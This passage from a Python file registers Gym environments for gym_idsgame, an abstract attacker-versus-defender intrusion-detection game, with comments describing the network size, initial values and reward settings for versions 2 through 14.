entry_point='gym_idsgame.envs:IdsGameMaximalAttackV2Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 2 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v2', entry_point='gym_idsgame.envs:IdsGameV2Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 3 ------------ # [AttackerEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 3 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v3', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV3Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 2 layer, 3 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 3 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v3', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV3Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 3 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v3', entry_point='gym_idsgame.envs:IdsGameRandomAttackV3Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 3 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v3', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV3Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 3 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v3', entry_point='gym_idsgame.envs:IdsGameV3Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 4 ------------ # [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 4 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v4', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV4Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 4 layer, 5 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 4 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v4', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV4Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 4 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v4', entry_point='gym_idsgame.envs:IdsGameRandomAttackV4Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 4 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v4', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV4Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 4 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v4', entry_point='gym_idsgame.envs:IdsGameV4Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 5 ------------ # [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 5 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v5', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV5Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, # defender following the "defend minimal strategy", connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 5 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v5', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV5Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 5 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v5', entry_point='gym_idsgame.envs:IdsGameRandomAttackV5Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, # attacker following the "attack maximal strategy", connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 5 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v5', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV5Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 5 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v5', entry_point='gym_idsgame.envs:IdsGameV5Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 6 ------------ # [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 6 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v6', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV6Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 4 layer, 5 servers per layer, 10 attack-defense-values, # defender following the "defend minimal strategy", connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 6 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v6', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV6Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 6 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v6', entry_point='gym_idsgame.envs:IdsGameRandomAttackV6Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, # attacker following the "attack maximal strategy", connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 6 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v6', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV6Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, connected layers # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 5 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v6', entry_point='gym_idsgame.envs:IdsGameV6Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 7 ------------ # [AttackerEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 7 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v7', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV7Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 2 layer, 3 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 7 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v7', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV7Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 7 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v7', entry_point='gym_idsgame.envs:IdsGameRandomAttackV7Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 7 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v7', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV7Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 7 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v7', entry_point='gym_idsgame.envs:IdsGameV7Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 8 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 8 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v8', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV8Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 8 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v8', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV8Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 8 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v8', entry_point='gym_idsgame.envs:IdsGameRandomAttackV8Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 8 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v8', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV8Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 8 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v8', entry_point='gym_idsgame.envs:IdsGameV8Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 9 ------------ # [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 9 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v9', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV9Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 9 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v9', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV9Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 9 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v9', entry_point='gym_idsgame.envs:IdsGameRandomAttackV9Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 9 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v9', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV9Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Dense # [Version] 9 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v9', entry_point='gym_idsgame.envs:IdsGameV9Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 10 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 10 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v10', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV10Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 10 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v10', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV10Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 10 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v10', entry_point='gym_idsgame.envs:IdsGameRandomAttackV10Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 10 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v10', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV10Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Dense # [Version] 10 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v10', entry_point='gym_idsgame.envs:IdsGameV10Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 11 ------------ # [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 11 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v11', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV11Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 11 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v11', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV11Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 11 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v11', entry_point='gym_idsgame.envs:IdsGameRandomAttackV11Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 11 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v11', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV11Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 11 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v11', entry_point='gym_idsgame.envs:IdsGameV11Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 12 ------------ # [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random), # Vulnerability value: 0 # [Rewards] Dense # [Version] 12 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v12', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV12Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random), # Vulnerability value: 0 # [Rewards] Dense # [Version] 12 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v12', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV12Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random), # Vulnerability value: 0 # [Rewards] Dense # [Version] 12 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v12', entry_point='gym_idsgame.envs:IdsGameRandomAttackV12Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random), # Vulnerability value: 0 # [Rewards] Dense # [Version] 12 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v12', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV12Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random), # Vulnerability value: 0 # [Rewards] Dense # [Version] 12 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v12', entry_point='gym_idsgame.envs:IdsGameV12Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 13 ------------ # [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0 # [Rewards] Dense # [Version] 13 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v13', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV13Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0 # [Rewards] Dense # [Version] 13 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v13', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV13Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0 # [Rewards] Dense # [Version] 13 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v13', entry_point='gym_idsgame.envs:IdsGameRandomAttackV13Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0 # [Rewards] Dense # [Version] 13 # [Observations] fully observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v13', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV13Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values # [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 10, Vulnerability value: 0 # [Rewards] Dense # [Version] 13 # [Observations] fully observed # [Attacker Starting Position] Start node # [Environment] Deterministic # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v13', entry_point='gym_idsgame.envs:IdsGameV13Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 14 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random defender # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 14 # [Observations] fully observed # [Environment] Random # 